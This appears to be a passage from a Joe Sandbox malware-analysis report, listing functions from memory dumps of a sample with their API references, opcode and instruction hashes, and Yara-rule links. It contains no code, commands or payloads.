API String ID: 1890195054-0
Opcode ID: c7873cdc98f0b5ca75172fbc10b900162357da5ae104584b0f44e20b63738351
Instruction ID: 6a638fbddfaf68fd950556b5f2e5ded50f31b7fc2ec4c1bcd5deb21fcc88c4ca
Opcode Fuzzy Hash: c7873cdc98f0b5ca75172fbc10b900162357da5ae104584b0f44e20b63738351
Instruction Fuzzy Hash: B11114B1C006699BCB20CF9AD444BDEFBF4AB48320F14812AE818B7250D778A941CFA5

Function 00D0F418 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 00D0F47F

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: d36070200c0175a47f94957adaf6581f66a5a2514366613b033c3e08d292d8ae
Instruction ID: a558d1f2e3c219893c1c770161ea6adedd9ba36517f33d7c80727ef25713d143
Opcode Fuzzy Hash: d36070200c0175a47f94957adaf6581f66a5a2514366613b033c3e08d292d8ae
Instruction Fuzzy Hash: 8711F3B1C006699BCB10DF9AC544BDEFBF4EF48320F24816AD818A7251D378A945CFA5

Function 06370804 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06372256

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1349a2e94ca4321877c0c3edf29c27b60cb318c4a34ee47f692fc2bb281be17b
Instruction ID: 38805123d1bff7df87a447f01332c3902f057200715954081c564adcc82a91f9
Opcode Fuzzy Hash: 1349a2e94ca4321877c0c3edf29c27b60cb318c4a34ee47f692fc2bb281be17b
Instruction Fuzzy Hash: 561132B6C002498FCB20DF9AC444BDEFBF4EB89220F10842AD429B7210D379A645CFA5

Function 06377FB4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0637885D

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 08d51f138a6d2ae3d0385e7c445852a6e3a9edeaa6663958ccba91851d73563b
Instruction ID: 51f9ce4eb1142ca1756eac078c510ba81f00439a3a83f792767db22f663bbc78
Opcode Fuzzy Hash: 08d51f138a6d2ae3d0385e7c445852a6e3a9edeaa6663958ccba91851d73563b
Instruction Fuzzy Hash: D01115B59003589FCB20DF9AD448BDEBBF4EB48324F208469D519A7310D378A944CFA5

Function 06377D7C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06378315), ref: 0637839F

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: fd5656d29f483bd08911a17fa55c289b571752cefbfed700baec5a0aa72f14b5
Instruction ID: 093b3b3e12719e9a397babae47853dc9bb628342289ec9bd63f1f6fc7ce37a5e
Opcode Fuzzy Hash: fd5656d29f483bd08911a17fa55c289b571752cefbfed700baec5a0aa72f14b5
Instruction Fuzzy Hash: E41136B5800248CFDB60DF9AC848BDEFBF4EB48320F208429D519A7250D378A944CFA5

Function 06378338 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06378315), ref: 0637839F

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 430c37e9c5fcf9bd5a3b841143e1c24fd4ffa13c6efd62d9237aeb5b06d89ec5
Instruction ID: cd4f75b1f0e7996219efbcbc38129950a21bcb782a2631d1cb3713c5732ddbf3
Opcode Fuzzy Hash: 430c37e9c5fcf9bd5a3b841143e1c24fd4ffa13c6efd62d9237aeb5b06d89ec5
Instruction Fuzzy Hash: 701136B5800249CFCB20CF9AD848BDEFFF4AB49324F20845AD459A3250D374A544CFA5

Function 06378801 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0637885D

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 493434dd6c3c62c8b517168c89c96826202b0aa74a27c37915868cd075e14024
Instruction ID: 2d1d68edff5750b74ff7d40c7cebab0b379969f69b2f7179d4027426c9c43d5a
Opcode Fuzzy Hash: 493434dd6c3c62c8b517168c89c96826202b0aa74a27c37915868cd075e14024
Instruction Fuzzy Hash: 421145B4900249CFCB20DFA9D488BCEFFF4AB48320F14846AE459A7211D378A584CFA5

Function 063D4708 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

XPpq, xrefs: 063D4845

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: XPpq
API String ID: 0-1266478781
Opcode ID: 253b309b333b88afc490fd87cdb33616c4d56b70b25434a3003b6dcdb011510f
Instruction ID: 28cc0b5e688cefd73f62ef7c82e0fc68feecfe76958bd40025157cd26903ce4a
Opcode Fuzzy Hash: 253b309b333b88afc490fd87cdb33616c4d56b70b25434a3003b6dcdb011510f
Instruction Fuzzy Hash: A5417F71F002089FEB54DFA5C814BAEBBF6EF89300F208529E506AB395DB759C059B90

Function 063DDA3D Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

PHkq, xrefs: 063DDB99

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 5fd1c7c5d44aec1811323f4b6a651c59de70e721aa2da49e5f6aecb334f67463
Instruction ID: 249c79d33ac2c63484d8003b4027077760424450a9526323eff866c33d4960fd
Opcode Fuzzy Hash: 5fd1c7c5d44aec1811323f4b6a651c59de70e721aa2da49e5f6aecb334f67463
Instruction Fuzzy Hash: 1B41A271E002099FDB61DF65D94069EBBB6FF85344F208529E406EB284DB74D94ACBC0

Function 063D21C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHkq, xrefs: 063D2303

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 5435d32aeda000cf992d6ae6057e9dd4877f63775b95ccaaaa513259bd887ed9
Instruction ID: 9c036083592ba4c7ed00258895d54a92d4f2ab8b82d81c78f4af9a1b17829372
Opcode Fuzzy Hash: 5435d32aeda000cf992d6ae6057e9dd4877f63775b95ccaaaa513259bd887ed9
Instruction Fuzzy Hash: 59310132B002018FCF95AB74EA5476F7BE6AB89204F248428E506DB399EF35DD49C7D1

Function 063DFAE0 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

|, xrefs: 063DFB40

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 50accb091c2debb283f4c998213960776d428a0e37583e65c428b93aa2aecb76
Instruction ID: bc2c8b7142430c5cd785e2f554f6992826184c5c6faeaacd6efedae9303f5380
Opcode Fuzzy Hash: 50accb091c2debb283f4c998213960776d428a0e37583e65c428b93aa2aecb76
Instruction Fuzzy Hash: 61117F75B102149FDB449B78D804B9E7BF5AF4C710F108469E50BE73A4DB35AD008B90

Function 063DFAF0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 063DFB40

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 32ed00aaa43493640d8f6e8fc6775b2a6ee8cfb67b049a25387605ae465d6df6
Instruction ID: 4b95198247ec2f31c45df630c3fd485bad2fdb0e987732f2a11b3264546a0493
Opcode Fuzzy Hash: 32ed00aaa43493640d8f6e8fc6775b2a6ee8cfb67b049a25387605ae465d6df6
Instruction Fuzzy Hash: 65115E75B102149FDB449B78D844B6DBBF5AF4C710F108469E50AD73A4DB35A9008B90

Function 063D5D58 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e491b8f2dfca421528ce342b25c9c2837aace2aba23be3b8dda9b8b0a47ea7
Instruction ID: 1a4bdc75f621675ac40d7c234cb7398397d10d067880ff4c0a3e62ff86942883
Opcode Fuzzy Hash: 79e491b8f2dfca421528ce342b25c9c2837aace2aba23be3b8dda9b8b0a47ea7
Instruction Fuzzy Hash: 3B61E1B2F001114FCF51AA7DD88466FAADBAFC4620B154439E80ADB379DE65DC0687D1

Function 063D3E51 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb870fbdefcc096fd473ef754107e8ec387ed3e734f90a0222c0d13da84cc498
Instruction ID: 08c390e1554d0696f8dddeead1ab9402e65c3aff0ccd0ba80cc0f772b3946849
Opcode Fuzzy Hash: cb870fbdefcc096fd473ef754107e8ec387ed3e734f90a0222c0d13da84cc498
Instruction Fuzzy Hash: B3815A35B002098FDF54DFA8D5547AEB7F6AF89300F108429E50ADB399EB34EC468B91

Function 063D416C Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc66cbcfd75897d32e4bf6777fae26d53f3baf02b88b9d898e66f9ae49b5490
Instruction ID: d1fe8120ebab25d29f0ee0c9dcc802c1e9bb6b3e4a3bce14d48eac503efdac0e
Opcode Fuzzy Hash: cdc66cbcfd75897d32e4bf6777fae26d53f3baf02b88b9d898e66f9ae49b5490
Instruction Fuzzy Hash: 34914031E106198FDF60DF68C890B9DB7B1FF89310F208695D549AB255DB70AE85CF90

Function 063D4180 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce8bd4cdadeeebe42469d775a793f2aee78befeab1e16ab394980ca783ea82e
Instruction ID: 0db7ab7854204cd4a40505f3b9ae8f7a7e8ec364aeb6e07d49a7d1c7f78d1038
Opcode Fuzzy Hash: 3ce8bd4cdadeeebe42469d775a793f2aee78befeab1e16ab394980ca783ea82e
Instruction Fuzzy Hash: AD913E31E106198BDF60DF68C890B9DB7B1FF89310F208699D549AB355DB70AE85CF90

Function 063DEA90 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd37f4315c467e0e80b1d830196a5016f93ff21133be54cedcc783e3275dab0
Instruction ID: 791550e1b80e1bd49ff536cde05a096d626566ff6c0b8f6d729fba69faccc1c1
Opcode Fuzzy Hash: 2cd37f4315c467e0e80b1d830196a5016f93ff21133be54cedcc783e3275dab0
Instruction Fuzzy Hash: 63712771E002099FDB54DBA8D980A9EBBF6FF84300F148529E406AB359DB30ED46CB90

Function 063DEAA0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb44d78d27d455aa225d6b21b34d2b4f64e55235741a17f9b0c2c7604bc5b53
Instruction ID: ee39ec3c281aae2e9fe89cb0470e846fa372fb9b65029d75fd58f0f7975c5785
Opcode Fuzzy Hash: 8bb44d78d27d455aa225d6b21b34d2b4f64e55235741a17f9b0c2c7604bc5b53
Instruction Fuzzy Hash: C1711871E002099FDB54DBA9D990A9EBBF6FF85300F148529E406AB359DB30ED46CB90

Function 063DF720 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5207849bf9919baad8309fd9c9a703365845152e6ebc521651fce5f40293ea
Instruction ID: 699b10afbe325ee140efcd08c0d06f01823e0634c7d4b53fa57f2f7be45d6711
Opcode Fuzzy Hash: 7b5207849bf9919baad8309fd9c9a703365845152e6ebc521651fce5f40293ea
Instruction Fuzzy Hash: 7151CF32E01105EFDB64AB78F4946ADBBB2EF84315F208869E007E7250DB35995ACBC0

Function 063DF4D0 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3639e28857443e57c1fb4867f502f0ee580a83562c422ad1c5dc4706cb6cf53
Instruction ID: bb91827dcf43fd552e3f3cf1db539c4e2b9ef937baec697b16b35ca987def899
Opcode Fuzzy Hash: f3639e28857443e57c1fb4867f502f0ee580a83562c422ad1c5dc4706cb6cf53
Instruction Fuzzy Hash: 1B51D971B102049FEF646A6CE99476F279FDB89310F20442EE00BD73E9CA29CC5987D1

Function 063DF4E0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8b925aac1afc99d04893f01f9f3090e6af1f6a193f6631714bd9fd6c9364cb
Instruction ID: 15edb90f5700eed3d7d1480e96f83adad6a2b3cc3493d470925d4ad05942e772
Opcode Fuzzy Hash: 9d8b925aac1afc99d04893f01f9f3090e6af1f6a193f6631714bd9fd6c9364cb
Instruction Fuzzy Hash: 4E51C871B102149FEF646A6CE99472F379FDB89300F20482AE00BD73E8CA69CC5947E1

Function 063D4FC0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b009ba14d51fb8bbcd3bec0185f45b2184a70b81a2598ddd6cc7f9aa33cc9c8
Instruction ID: ef00f8298d6961ab0adcca2c061288221b54eeef0068c692d4a296e6b6ffe3e8
Opcode Fuzzy Hash: 0b009ba14d51fb8bbcd3bec0185f45b2184a70b81a2598ddd6cc7f9aa33cc9c8
Instruction Fuzzy Hash: 16418F72E002099FDF70CEA9E881AAFFBF5FB45324F10492AE156D7650D331A9498BD1

Function 063D2078 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35633634f92871592ea43f5362848338f4c90149ab6ab09b6975edb9cb7a3a35
Instruction ID: 5d0b809b65436b8c0c4edfed50afc87d296913a32d9a1cb0825821210da275c7
Opcode Fuzzy Hash: 35633634f92871592ea43f5362848338f4c90149ab6ab09b6975edb9cb7a3a35
Instruction Fuzzy Hash: 0D319A31E106059BDB15DF65D854AAEFBB2FF89300F108828E906EB350DB31E946CB90

Function 063D2088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74ad77a288ef32b6be51cd5730531f2cfc1af4473b6a01459f5218a5d582b34
Instruction ID: 27532e60db4931a1fa71d900f9f54f2a0fbc7885fdb4782ca2751fe3da1422cb
Opcode Fuzzy Hash: b74ad77a288ef32b6be51cd5730531f2cfc1af4473b6a01459f5218a5d582b34
Instruction Fuzzy Hash: F0316935E106059BDB58CF65D9546AEF7F2FF89300F10C929E906EB354DB31A94ACB80

Function 063D3A59 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64ebd3180dcf96161ace1ab2a3bfb5f5426aa8fe6b3207d830609b8a3623bc5
Instruction ID: 47c2f29ace50b2402896a136955016b3454e6535dd925038912a0d8edda3671f
Opcode Fuzzy Hash: f64ebd3180dcf96161ace1ab2a3bfb5f5426aa8fe6b3207d830609b8a3623bc5
Instruction Fuzzy Hash: 9F217C75F002199FEB50DF69E980AEEB7F5EB49310F108029E905E7294E734E8418BE1

Function 00CBD005 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ef4cd87494dae6966552677ccbf8ba596113d5014321b5c1d303eed2607b50
Instruction ID: 9c6daed83227c87cf20735bb0ba9f175915476ff3be1615baa381fbe85609b27
Opcode Fuzzy Hash: 15ef4cd87494dae6966552677ccbf8ba596113d5014321b5c1d303eed2607b50
Instruction Fuzzy Hash: DF316B7150D3C49FCB03DF24D990751BF71AB56214F29C5EBD8898F2A3D23A980ACB62

Function 063D3A68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e8e2f113d5a1647854bafe90a180c3de025d7687e710514a12b519d02dacad
Instruction ID: ae50e7b7efa035a6e0497c5d20284018f31305ad09c84aaebb48de979d0596da
Opcode Fuzzy Hash: a6e8e2f113d5a1647854bafe90a180c3de025d7687e710514a12b519d02dacad
Instruction Fuzzy Hash: 17218C76F006199FEB40DF69E980AAEB7F5FB49310F10802AE905E7394E734ED448B91

Function 00CBD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae655254ad4ed85facc8243a0310088693e148816d9d31fe8179724d422ae7f
Instruction ID: bcc42a01da02e57c2cad9717f609a2dff11527e4b315a390e93c9aa8bd43a332
Opcode Fuzzy Hash: 2ae655254ad4ed85facc8243a0310088693e148816d9d31fe8179724d422ae7f
Instruction Fuzzy Hash: E5210171604204DFCB14EF14EAC0B66BBA5FB84314F24C66DE80A4B296D33AD847CB62

Function 00CBD118 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb452b80af8b8ff7b915dcb74f2abf44fb16927ddb307a14bf67b5ba7d73c98
Instruction ID: 1decb21f6190c81ff2d902894b88cf2a686e54b56f05affbf8219bc303199f46
Opcode Fuzzy Hash: edb452b80af8b8ff7b915dcb74f2abf44fb16927ddb307a14bf67b5ba7d73c98
Instruction Fuzzy Hash: 61212671604300DFDB04DF18D9C0B2ABFA5FB84328F20C56DE80A4B351D33AD846CA61

Function 063D6890 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478d5ad28c25ca108d298527422b544e28d9fc8667190a84ad5ae2d2fb7670eb
Instruction ID: a9615b0c0ba79fe282d9491fefbe07bab49d802e074109282ab2e5435d2097aa
Opcode Fuzzy Hash: 478d5ad28c25ca108d298527422b544e28d9fc8667190a84ad5ae2d2fb7670eb
Instruction Fuzzy Hash: C721DF32F100199FCF84EB69F96169EB7B6EB86310F108429E515EB384EB30ED058BC0

Function 063D3B78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e5d03d3132dfa15dcccbe521cfcbff63119e5aadd8bff324f588a0bb0584f9
Instruction ID: d5cf4054b625bafc7c44e4e375c371301333bcb19a4ab2975b3fbf8802fbd74d
Opcode Fuzzy Hash: e5e5d03d3132dfa15dcccbe521cfcbff63119e5aadd8bff324f588a0bb0584f9
Instruction Fuzzy Hash: 1A11A136B105284FDF58AA79E8146AF73EAEBCA710F048439C506E7358EF25EC058BD1

Function 063D3DB3 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61984f4e29ecbb78779c0d84343c7c38d65e8134cf1a8896a7b10fbb518b097e
Instruction ID: 598ee19ff71ba2c55da5fb3558d559d641a6b86cedfd93c8801e6039d61dd69f
Opcode Fuzzy Hash: 61984f4e29ecbb78779c0d84343c7c38d65e8134cf1a8896a7b10fbb518b097e
Instruction Fuzzy Hash: 8601F536B001510FD7619A3D941072BF7DADFC6710F10883AE50ACB395DE21DC4A83D2

Function 063D3831 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e587fb3a4cabd916b89a839911c9c639197077b13596ef9fe52587aef53d9d02
Instruction ID: 81e7311111aa21f624ca379a8d916be4f13d201066c83d210868f0f5e56bd915
Opcode Fuzzy Hash: e587fb3a4cabd916b89a839911c9c639197077b13596ef9fe52587aef53d9d02
Instruction Fuzzy Hash: 2F21C2B5D01259AFCB00CF9AD884ADEFBB4FB49324F10812AE518A7350D374A944CFE5

Function 063D9E78 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f191005d20d0b8eb70a6f99e63384bfdf74b800c0c8beb262a9819c607636a49
Instruction ID: b9682cb3838565ea1eb53e02403d5df6a2b2bceaa65ded1d48ae590f73f227d3
Opcode Fuzzy Hash: f191005d20d0b8eb70a6f99e63384bfdf74b800c0c8beb262a9819c607636a49
Instruction Fuzzy Hash: A901F536B101101FC7919A3CA850B6BB7DAEB46710F108829E60EC7385DA25EC0583D1

Function 063DED12 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9a20a1fd85478a0b8e347441ee2a7a48ed6821916c21b8f2da4310ebae336f
Instruction ID: cb5de568505fbfde5665b12bb77186aee6c06452b81086d25c7459ae7cf86a49
Opcode Fuzzy Hash: 3b9a20a1fd85478a0b8e347441ee2a7a48ed6821916c21b8f2da4310ebae336f
Instruction Fuzzy Hash: 9F01FD32B104101FCB609A3CA850B3BABCADBCA724F14883AE50BCB348EE15DC0643D5

Function 00CBD113 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction ID: 1d12fc774e95b38eac2ddb1c3eca407dd479d2b850e4c3c5016893c6415729be
Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
Instruction Fuzzy Hash: 5811DD75504280CFCB05CF14D9C4B19BFB2FB94328F24C6ADD84A4B662C33AD94ACB51

